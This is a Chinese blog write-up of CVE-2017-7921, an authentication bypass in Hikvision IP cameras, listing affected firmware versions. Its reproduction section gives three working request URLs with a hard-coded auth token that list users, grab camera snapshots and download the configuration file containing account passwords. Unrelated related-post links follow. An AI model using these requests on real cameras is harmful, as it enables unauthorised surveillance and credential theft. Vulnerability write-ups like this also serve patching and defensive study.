2. 程式人生 > 實用技巧 >海康威視CVE-2017-7921

海康威視CVE-2017-7921

阿新 發佈:2020-12-22

海康威視CVE-2017-7921

漏洞概述

通過構造url進行檢索所有使用者、螢幕截圖、配置檔案下載

漏洞危害等級:中危

影響版本

  • HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

    • 版本至5.4.0build160530版本;

  • DS-2CD2xx0F-ISeries5.2.0build140721

    • 版本至5.4.0Build160401版本;

  • DS-2CD2xx2FWDSeries5.3.1build150410

    • 版本至5.4.4Build161125版本;

  • DS-2CD4x2xFWDSeries5.2.0build140721

    • 版本至5.4.0Build160414版本;

  • DS-2CD4xx5Series5.2.0build140721

    • 版本至5.4.0Build160421版本;

  • DS-2DFxSeries5.2.0build140805

    • 版本至5.4.5Build160928版本;

  • DS-2CD63xxSeries5.0.9build140305

    • 版本至5.3.5Build160106版本

基礎環境

元件 版本
os win7
web IE

漏洞復現

命令:
IP/Security/users?auth=YWRtaW46MTEK
檢索所有使用者及其角色的列表
IP/onvif-http/snapshot?auth=YWRtaW46MTEK


獲取相機快照而不進行身份驗證
IP/System/configurationFile?auth=YWRtaW46MTEK

下載攝像頭配置賬號密碼檔案

得到二進位制配置檔案:configurationFile

configurationfile檔案解碼器

相關推薦

CVE-2017-7921

CVE-2017-7921 漏洞概述 通過構造url進行檢索所有使用者、螢幕截圖、配置檔案下載

SDK登入失敗,錯誤碼為8

耗時幾天,終於找到真因 問題背景:除錯正常,突然之間啥都沒改,一直報8錯誤。

Vue+視訊web外掛開發

Vue+視訊web外掛開發 vue視訊監控 一、 環境準備 官網下載的Web端視訊外掛以及開發的Demo、文件

[C#] 折騰的人體測溫 模組

技術標籤:C#教程c# 單位的專案需要測溫,同事買了個的人體測溫機芯,型號位:TB-4117-3/S,給了一份pdf的說明書。

c++實習生面試資料

面對物件 1. 三大特性:封裝,繼承,多型 2.封裝性:資料和程式碼捆綁在一起,避免外界干擾和不確定性訪問。封裝可以使得程式碼模組化。

2020 年度總營收 634.27 億元, 同比增長 10.01 %

2 月 26 日訊息 今天,釋出 2020 年度業績快報。 2020 年度實現營業總收入 63,427,339,774.84 元,比上年同期增長 10.01%。

:國內晶片市場百花齊放,眾多廠家晶片都可以使用

3月3日訊息據證券時報,海康威視在接待調研時表示,目前,國內的晶片市場是百家爭鳴、百花齊放的狀態。即使短時間沒有一個龍頭的晶片廠家出來,現成眾多廠家晶片都是可以使用的,所以對於供應鏈的穩定方面,我們現在

:被制裁時提高了物料備貨、有針對性的做替代,方得以應對現在局面

近日,海康威視舉行投資者問答會議。 海康認為,所謂平臺型公司的存在需要有合適的土壤,在較為扁平、鏈條較短的商業環境中,平臺型公司比較容易生長出來,但不是所有的行業都有培育平臺型公司的機會。to B,to G 業

美 FCC 盯上華為、等五家公司監控攝像頭,稱這些產品存在安全擔憂

6 月 17 日訊息,據外媒報道,美國監管機構計劃禁止華為和其他四家中國電子公司的監控裝置,包括在美國學校廣泛使用的監控攝像頭,理由是這些產品存在安全擔憂。

:美國 FCC 限制影響不大,機器視覺追趕基恩士

近日,舉行投資者問答會議。 表示,一季度高增速有去年基數原因,二季度不太可能維持一季度的高增速,後續會逐漸平滑。

ISC平臺的VUE二次開發接入實現

第一步 取得ISC平臺的appkey以及secret,以及安裝ISC平臺的主機IP,這一步至關重要!!!

捐助 5000 萬支援河南

7 月 24 日訊息昨日釋出公告,向鄭州市紅十字會捐贈人民幣 5000 萬元,並授權公司經營層根據實際情況組織實施捐贈。

:上半年營收、淨利同比增約 40%,創新業務同比增 122.18%

近日, 2021 年半年度報告出爐,並舉行了投資者問答會議。 指出在的共同影響下,全球供應鏈、物流都出現緊張的局面,行業整體產能經受考驗。

Java整合SDK

Java整合SDK SDK下載 SDK Demo執行 SDK整合到自己專案

攝像頭

新機器 插網線會自動彈出設定裝置密碼,賬號都是admin 舊裝置 用400軟體,點忘了密碼,開啟重置密碼二維碼 手機開啟微信公眾號掃碼 獲取安全碼,然後重置密碼

用猿大師VLC播放程式在高版本Chrome、Firefox、Edge等瀏覽器中低延遲播放、大華攝像頭RTSP視訊流(圖文教程)

近期在做一個智慧城市專案,要求將、大華等攝像頭RTSP視訊流在Chrome、Firefox、Edge等瀏覽器中播放,並且要求延遲必須要低,能到多低就多低,最好是實時視訊。

:第三季度淨利潤 44.84 億元,同比增 17.54%

10 月 22 日訊息,今日,海康威視披露三季度報告,第三季度實現營業收入為 217.27 億元,同比增長 22.41%;歸母淨利潤 44.84 億元,同比增長 17.54%;基本每股收益 0.48 元。報告還顯示,海康威視前三季度淨利潤為

:汽車電子業務不蹭熱門概念,前三季度創新業務同比增長 88.6%

近日海康舉行了投資者問答。2021 年前三季度,海康實現營業收入 556.29 億元,比上年同期增長 32.38%;實現歸屬於上市公司股東的淨利潤 109.66 億元,比上年同期增長 29.94%;前三季度毛利率 46.33%,保持穩定。第三

、大華旗下監控攝像頭產品被美國家得寶、百思買下架

據 TechCrunch 報道,近日,多家美國零售巨頭已下架了中國廠商 Lorex(洛瑞思)、Ezviz(螢石)監控攝像頭產品。前者是大華股份子公司,後者是海康威視旗下的監控技術品牌。美國零售商下架 Lorex 和 Ezviz,背後矛頭

69 元: 65W 雙口充電套裝再次探底

海康威視 65W 氮化鎵雙口充電器 + 100W 資料線套裝日常售價 99 元,今日再次降至雙 11 期間大促價 69 元,有需求的小夥伴可以關注下:點此檢視。輸出功率:支援 PD3.0/QC4.0/QC3.0/SCP/MTK 等快充協議,更方便。京東